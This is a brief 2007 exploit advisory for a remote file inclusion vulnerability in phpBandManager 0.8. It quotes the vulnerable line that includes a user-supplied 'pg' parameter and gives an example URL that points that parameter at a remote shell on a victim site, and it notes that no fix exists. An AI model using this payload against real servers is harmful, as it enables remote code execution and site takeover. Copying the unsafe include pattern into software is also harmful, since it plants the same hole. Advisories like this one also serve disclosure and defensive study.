phpBandManager 0.8 (index.php pg) Remote File Inclusion Vulnerability

2007-04-26 00:00:00

author:koray
greetz:cigicigi.net
script:http://sourceforge.net/projects/phpbandmanager

allow_url_fopen:on or register_globals:on

vuln;

/bandmanager/suite/index.php

include($_GET['pg'].".php");

example;

http://www.victim.com/suite/index.php?pg=shell link?

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.